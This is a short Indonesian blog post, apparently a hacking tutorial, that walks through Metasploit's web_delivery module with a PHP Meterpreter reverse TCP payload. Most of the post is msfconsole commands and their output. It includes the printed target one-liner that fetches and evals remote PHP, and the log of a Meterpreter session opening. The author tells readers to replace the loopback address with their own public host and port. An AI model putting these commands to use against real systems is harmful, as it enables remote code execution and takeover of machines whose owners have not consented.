hallo guys ketemu lagi sama cakil..
kali ini cakil akan share tentang Metasploit Web Delivery Script & command injection To Pop a shell
oke cekidots
Use Metasploit Web Delivery Script & command injection To Pop a shell
btw ganti host 127.0.0.1 sama host public kalian
karna ini hanya testing gua make 127.0.0.1 ok
lport pake port public kalian :)
msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 PSH (Binary)
msf exploit(multi/script/web_delivery) > set target 1
target => 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf exploit(multi/script/web_delivery) > set lport 1337
lport => 1337
msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:1337
[*] Using URL: http://0.0.0.0:8080/nHBdVWJ6UUYjv
[*] Local IP: http://10.251.71.73:8080/nHBdVWJ6UUYjv
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://127.0.0.1:8080/nHBdVWJ6UUYjv'));"
msf exploit(multi/script/web_delivery) > [*] 127.0.0.1 web_delivery - Delivering Payload
[*] Sending stage (37775 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:1337 -> 127.0.0.1:50442) at 2018-12-29 13:18:27 +0700
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > help
kelebihan.. kita bisa membuat payload seperti
Python
PHP
PSH
Regsvr32
PSH (Binary)
okey enjoy
tunggu update an terbaru nya ea.. pasti akan lebih seru dan menantang wkkwkw
0 Comments